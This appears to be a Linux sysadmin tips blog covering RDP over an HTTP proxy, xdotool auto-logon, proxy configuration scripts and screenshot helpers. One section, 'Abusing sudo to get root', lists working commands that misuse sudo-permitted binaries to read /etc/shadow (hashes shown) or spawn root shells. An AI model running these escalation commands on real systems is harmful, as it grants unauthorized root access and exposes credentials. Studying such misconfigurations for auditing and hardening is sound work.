How-To: Rdesktop over (HTTP) Proxy

How to connect to a remote desktop host via an HTTP Proxy

In this example we will use, once again, socat. Here is how to connect to a Terminal Server which can be reach only behind an HTTP Proxy.

First, make sure that your $http_proxy environment variable is set properly.

Add the following function to your ~/.bashrc:

function rdesktop_proxy () {
 
 if [ $# -lt 1 ]; then
  echo "usage: $0 <hostname/ip>"
  return
 fi

 HOST=$1
 PROXY_HOST=$(echo $http_proxy | sed 's,http:,,;s,/,,g' | cut -d: -f1)
 PROXY_PORT=$(echo $http_proxy | sed 's,http:,,;s,/,,g' | cut -d: -f2)

 socat TCP4-LISTEN:51515,bind=127.0.0.1,reuseaddr PROXY:$PROXY_HOST:$HOST:3389,proxyport=$PROXY_PORT &

 /usr/local/bin/xfreerdp +clipboard +home-drive "/t:$1" /v:127.0.0.1:51515 "${@:2}"
}

Then re-source your shell:

source ~/.bashrc

And you can just type:

rdesktop_proxy my.rdpdomain.com /u:John

The example above use the xfreerdp client, but you can adjust it to use your favourite RDP client, you get the idea.

NTP behind a HTTP proxy?

As NTP uses UDP port 123, of course setting the date via NTP (ntpdate) behind a proxy isn't possible without doing some tunneling/encapsulation wizardry. There is, however, a very nice solution using the time api. As it works over a Web server, the proxy problem is immediately resolved.

For example, to set your date/time according to your timezone:

# export http_proxy=http://proxy.mycompany.com:8080/
# date -s "$(wget -q -O - http://www.timeapi.org/gmt)"

Easy, right!

Abusing sudo to get root

In some insecure Linux configurations, it is more or less easy to abuse sudo to get a root shell.

You can find out which commands your user is allowed to run as root by calling "sudo -l".

Here are some examples:

1. SUDO NMAP

user@host:~$ sudo nmap -iL /etc/shadow 2>&1 | grep root
Failed to resolve "root:$6$tacLae7v$blr1A8KS2WwHTLgttagiFMgGa94JEkKXVNXAm8a5Lg5vJrdowQTiycwML9M2ibBF6Vu4KZAHcOgOLuqrc6kdn0:16135:0:99999:7:::".

(nmap < 5.35DC1 also has a “—interactive” switch which drops you to a shell where you can execute commands by using the “!cmd” syntax)

2. SUDO FILE

user@host:~$ sudo file -m /etc/shadow
/etc/shadow, 1: Warning: offset `root:$6$5EZeAFXG$V.b3POklvJLNMt0cIEIQecW2Co6cKFUXmDR5bHVjWdsgTJq8URt6m7zBfNFNxdMEZHD7F4esGON.OED88HBPn1:16491:0:99999:7:::' invalid
[... snip ...]

3. SUDO TCPDUMP

user@host:~$ echo -e "cp /bin/sh /tmp/sh_suid\nchmod 7555 /tmp/sh_suid" > tmpfile
user@host:~$ chmod +x tmpfile
user@host:~$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
Maximum file limit reached: 1
user@host:~$ ls -l /tmp/sh_suid 
-r-sr-sr-t 1 root root 117176 May 19 10:14 /tmp/sh_suid
user@host:~$ /tmp/sh_suid
# whoami
root

4. SUDO ZIP

user@host:~$ touch somefile
user@host:~$ sudo zip -q /tmp/test.zip somefile -T -TT '/bin/sh #'
# id
uid=0(root) gid=0(root) groups=0(root)

5. SUDO FIND

user@host:~$ sudo find /dev/null -exec sh \;
# id
uid=0(root) gid=0(root) groups=0(root)

6. SUDO TAR

user@host:~$ touch somefile
user@host:~$ sudo tar cf /dev/null somefile --checkpoint=1 --checkpoint-action=exec=/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)

7. SUDO RSYNC

user@host:/tmp$ cat > somefile << EOF
> cp /bin/sh /tmp/sh_root
> chmod a+sx /tmp/sh_root
> EOF
user@host:/tmp$ sudo rsync  -e 'sh /tmp/somefile' /dev/null 127.0.0.1:/dev/null 2>/dev/null
user@host:/tmp$ /tmp/sh_root
# whoami
root

8. SUDO AWK

user@host:~$ sudo awk 'BEGIN {system("/usr/bin/id")}'
uid=0(root) gid=0(root) groups=0(root)

9. SUDO MORE/SUDO LESS

user@host:~$ sudo more /dev/zero 
[...]
!bash
root@host:~# id
uid=0(root) gid=0(root) groups=0(root)

10. SUDO (S)FTP

user@host:~$ sudo ftp
ftp> !id
uid=0(root) gid=0(root) groups=0(root)
ftp> 

11. SUDO MOUNT

user@host:~$ sudo mount -o bind /bin/bash /bin/mount
user@host:~$ sudo mount
root@host:~# id
uid=0(root) gid=0(root) groups=0(root)

8. SUDO MAN

user@host:~$ sudo man -P id man
uid=0(root) gid=0(root) groups=0(root)

Automatic rdesktop logon (Linux)

So when you want to test the connection to multiple Windows boxes from your Linux workstation, you have to go through this boring process every time:

- Bring up the rdesktop session
- Type in the user name
- Type in the password
- Hit OK

To automatise this, you can obviously go with:

rdesktop 10.1.1.10 -u Username -p Password

And this will work. But if you have to accept a legal notice prior to being able to type in your creds, you'll notice that the password on the command line won't work. Not easy to script. Also you would have noticed that copy/pasting in the password fields is disabled.

Here is how to automate this using xdotool. Add this function to the end of your ~/.bashrc:

function rdesktop_autologin()
{
 if [ $# != 3 ]; then
  echo "usage: $0 <hostname/ip> <username> <password>"
  return
 fi
 
 IP=$1
 USER=$2
 PASS=$3

 Xaxis=$(xdpyinfo | grep dimensions | awk '{print $2}' | cut -dx -f1)
 Yaxis=$(xdpyinfo | grep dimensions | awk '{print $2}' | cut -dx -f2)
 MaxRes=$Xaxis"x"$(($Yaxis-50))

 /usr/bin/rdesktop -T "$IP" "$IP" -g $MaxRes -u "$USER" -r disk:home=${HOME} -r disk:tmp=/tmp -r clipboard:PRIMARYCLIPBOARD -D -K &
 sleep 3

 WINDOWID=$(xwininfo  -root -tree | grep rdesktop | grep "$IP" | awk '{print $1}')

 if [ "$WINDOWID" == "" ]; then
  echo no window found
  exit
 fi

 echo attaching to $WINDOWID...
 xdotool windowactivate $WINDOWID
 xdotool windowfocus $WINDOWID
 sleep 1

 xdotool key "Return"
 xdotool key "Return"
 xdotool type "$PASS"
 xdotool key "Return"
}

And then just run:

source ~/.bashrc
rdesktop_autologin 10.1.1.10 Username Password

It makes my life so easier. That said, legal notices are here to be read. Heh.

[Debian/Ubuntu/Gnome] Set the proxy settings system-wide (apt, bash, wget, ssh, git, svn)

If you often change network locations, work with different network settings, you may find it annoying to update your proxy settings every time in all configuration files (/etc/apt/apt.conf, ~/.ssh/config, maybe proxychains, environment variables and gnome settings).

I use the following script to update the settings in every location. I may add other files to the script when required.

Currently the script with update your proxy settings for:

• Apt (if running as root)
• Proxychains (if running as root)
• Firefox
• Chrome / Gnome / System proxy
• SSH (for entries already containing "ProxyCommand")
• Bash / Wget / any program using the $http_proxy environment variable
• Git
• SVN

Note: Some proxy tunnels are configured to use socat, so you probably need to install it before.

#!/bin/bash

if [ -z $2 ]; then
 echo "usage: $0 <proxy ip> <proxy port> [ <proxy user> <proxy pass> ]"
 exit
fi

if [ $EUID -eq 0 ]; then
 # Apt.conf
 echo "updating apt.conf..."
 if [ $# -eq 4 ]; then
  echo "Acquire::http::Proxy \"http://$3:$4@$1:$2/\";" > /etc/apt/apt.conf
 else
  echo "Acquire::http::Proxy \"http://$1:$2/\";" > /etc/apt/apt.conf
 fi
 chmod 600 /etc/apt/apt.conf

 # Proxychains
 if [ -e /etc/proxychains.conf ]; then
  echo "updating proxychains.conf..."
  echo strict_chain > /etc/proxychains.conf
  echo tcp_read_time_out 15000 >> /etc/proxychains.conf
  echo tcp_connect_time_out 8000 >> /etc/proxychains.conf
  echo \[ProxyList\] >> /etc/proxychains.conf
  if [ $# -eq 4 ]; then
   echo http $1 $2 $3 $4 >> /etc/proxychains.conf
  else
   echo http $1 $2 >> /etc/proxychains.conf
  fi
  chmod 600 /etc/proxychains.conf
 fi
else
 echo "Warning: Must run as root to update all config files (skipped: apt, proxychains)"
fi

# Firefox
PREFS_FILE="${HOME}/.mozilla/firefox/$(cat ${HOME}/.mozilla/firefox/profiles.ini | grep Path | sed 's/Path=//')/prefs.js"
if [ -e $PREFS_FILE ]; then
 echo "updating firefox config..."
 sed -i '/^user_pref("network.proxy./d' $PREFS_FILE
 echo "user_pref(\"network.proxy.ftp\", \"$1\");" >> $PREFS_FILE
 echo "user_pref(\"network.proxy.ftp_port\", $2);" >> $PREFS_FILE
 echo "user_pref(\"network.proxy.http\", \"$1\");" >> $PREFS_FILE
 echo "user_pref(\"network.proxy.http_port\", $2);" >> $PREFS_FILE
 echo "user_pref(\"network.proxy.share_proxy_settings\", true);" >> $PREFS_FILE
 echo "user_pref(\"network.proxy.socks\", \"$1\");" >> $PREFS_FILE
 echo "user_pref(\"network.proxy.socks_port\", $2);" >> $PREFS_FILE
 echo "user_pref(\"network.proxy.socks_remote_dns\", true);" >> $PREFS_FILE
 echo "user_pref(\"network.proxy.ssl\", \"$1\");" >> $PREFS_FILE
 echo "user_pref(\"network.proxy.ssl_port\", $2);" >> $PREFS_FILE
 echo "user_pref(\"network.proxy.type\", 1);" >> $PREFS_FILE
fi

# ssh
if [ -e ~/.ssh/config ]; then
 echo "updating ssh config..."
 if [ $# -eq 4 ]; then
  CFG="ProxyCommand socat - PROXY:$1:%h:%p,proxyport=$2,proxyauth=$3:$4"
 else
  CFG="ProxyCommand socat - PROXY:$1:%h:%p,proxyport=$2"
 fi
 sed -i -r "s/ProxyCommand socat (.*)/$CFG/g" ~/.ssh/config
 chmod 600 ~/.ssh/config
fi

# Bash / Wget
if [ -e ~/.bashrc ]; then
 echo "updating ~/.bashrc..."

 sed -i '/export http[s]*_proxy=/d' ~/.bashrc

 if [ $# -eq 4 ]; then
  echo "export http_proxy=http://$3:$4@$1:$2/" >> ~/.bashrc
 else
  echo "export http_proxy=http://$1:$2/" >> ~/.bashrc
 fi

 echo "export https_proxy=\$http_proxy" >> ~/.bashrc

 source ~/.bashrc
fi

# Gnome / system
echo "updating system proxy..."
if [ $# -eq 4 ]; then
 gsettings set org.gnome.system.proxy.http authentication-user "$3"
 gsettings set org.gnome.system.proxy.http authentication-password "$4"
else
 gsettings set org.gnome.system.proxy.http authentication-user ""
 gsettings set org.gnome.system.proxy.http authentication-password ""
fi
gsettings set org.gnome.system.proxy mode "manual"
gsettings set org.gnome.system.proxy.http host "$1"
gsettings set org.gnome.system.proxy.http port $2
gsettings set org.gnome.system.proxy.ftp host "$1"
gsettings set org.gnome.system.proxy.ftp port $2
gsettings set org.gnome.system.proxy.https host "$1"
gsettings set org.gnome.system.proxy.https port $2
gsettings set org.gnome.system.proxy ignore-hosts "['localhost', '127.0.0.0/8', '10.0.0.0/8', '192.168.0.0/16', '*.localdomain.com', '*.mycompany.com' ]"

# Git
if [ -e ~/.gitconfig ]; then
 echo "updating git..."
 if [ $# -eq 4 ]; then
  echo "exec socat STDIO PROXY:$1:\$1:\$2,proxyport=$2,proxyauth=$3:$4" > ~/.gitproxy
 else
  echo "exec socat STDIO PROXY:$1:\$1:\$2,proxyport=$2" > ~/.gitproxy
 fi
 git config --global core.gitproxy ~/.gitproxy
fi

# SVN
if [ -e ~/.subversion/servers ]; then
 echo "updating subversion..."
 if [ $# -eq 4 ]; then
  sed -i "s/^[# ]*\(http-proxy-username\).*/\1 = $3/" ~/.subversion/servers
  sed -i "s/^[# ]*\(http-proxy-password\).*/\1 = $4/" ~/.subversion/servers
 else
  sed -i 's/^\(http-proxy-username.*\)/# \1/' ~/.subversion/servers
  sed -i 's/^\(http-proxy-password.*\)/# \1/' ~/.subversion/servers
 fi
 sed -i "s/^[# ]*\(http-proxy-host\).*/\1 = $1/" ~/.subversion/servers
 sed -i "s/^[# ]*\(http-proxy-port\).*/\1 = $2/" ~/.subversion/servers
fi

Open different file types with the same command (Linux)

Sometimes on the command prompt I want to open files without worrying about which application to use for it. Just like with double clicks and file associations. Set this function in your ~/.bashrc and then just use "view <filename>" to render it in the correct application.

function view() {
 if [ $# == 0 ]; then
  echo "usage: $0 <file1> [ <file2> ... ]"
 fi

 OLD_IFS=$IFS
 IFS=""

 for ARG in "$@"; do

  if [ -f "$ARG" ]; then

   MIME=$(file -b --mime-type "$ARG")
   MIME_1=${MIME%/*}

   case "$MIME" in
    application/pdf)
     evince "$ARG" &
     continue;;

    application/zip | application/x-gzip | application/x-bzip2)
     file-roller "$ARG" &
     continue;;

    application/vnd.ms-excel)
     libreoffice --calc "$ARG" &
     continue;;

    application/msword)
     libreoffice --writer "$ARG" &
     continue;;
   esac

   case "$MIME_1" in
    archive)
     file-roller "$ARG" &
     continue;;

    image)
     eog "$ARG" &
     continue;;

    text)
     sublime_text "$ARG"
     continue;;
   esac
   echo "No handler known for type $MIME"
  fi

 done
 IFS=$OLD_IFS
}

And then re-source you Bash shell:

source ~/.bashrc

You're good to go. You might want to modify the file handlers / add some more to match your own setup.

Linux screenshot solution

I often work on different projects, switch between projects all the time, and need to take screenshots. If you’re in a similar situation you may find this useful.

1. Install scrot

sudo apt-get install scrot

2. Create a file with your current project name. it can also be an environment variable but I find the file solution easier to work with.

echo MyProject > $HOME/.current

3. Create a shell script with the following contents:

#!/bin/bash
PROJECT=$(cat ${HOME}/.current)
DATE=$(date +%Y-%m-%d.%s)

if [ ! -d "${HOME}/projects/$PROJECT/shots" ]; then
    mkdir -p "${HOME}/projects/$PROJECT/shots"
fi

scrot "${HOME}/projects/${PROJECT}/shots/${PROJECT}_${DATE}.jpg" -s -q 90

4. You can create a lancher to this shell script that you can put in your launcher bar or whatever:

bash $HOME/screenshot.sh

Your screenshots will be saved for each project under the appropriate folder. Don’t forget to update your project file whenever you switch projects.

Linux rdesktop fullscreen script

Under Linux with Gnome for example, you might want to rdesktop into a windows host and go full screen. However then it’s a real pain to reduce the window and switch between running apps, so you end up trying to find out the most appropriate resolution for your rdesktop session.

Here is a shell script to detect the screen dimensions, excluding the window manager’s top and bottom bars, and remove the rdesktop window decorations. Also it will map your /tmp and /home/user into the remote desktop session.

Adjust the number of pixels to exclude according to your configuration. I found the value 50 appropriate for a standard gnome-shell in classic mode, each of the bars being 25px.

#!/bin/bash
Xaxis=$(xdpyinfo | grep dimensions | awk '{print $2}' | cut -dx -f1)
Yaxis=$(xdpyinfo | grep dimensions | awk '{print $2}' | cut -dx -f2)
MaxRes=$Xaxis"x"$(($Yaxis-50))
rdesktop $1 -5 -u "$2" -g $MaxRes -r disk:home=${HOME} -r disk:tmp=/tmp -r clipboard:PRIMARYCLIPBOARD -D -K

And then you can run:

sh rdesktop.sh 192.168.0.10 MyUsername

Now go create a launcher for that.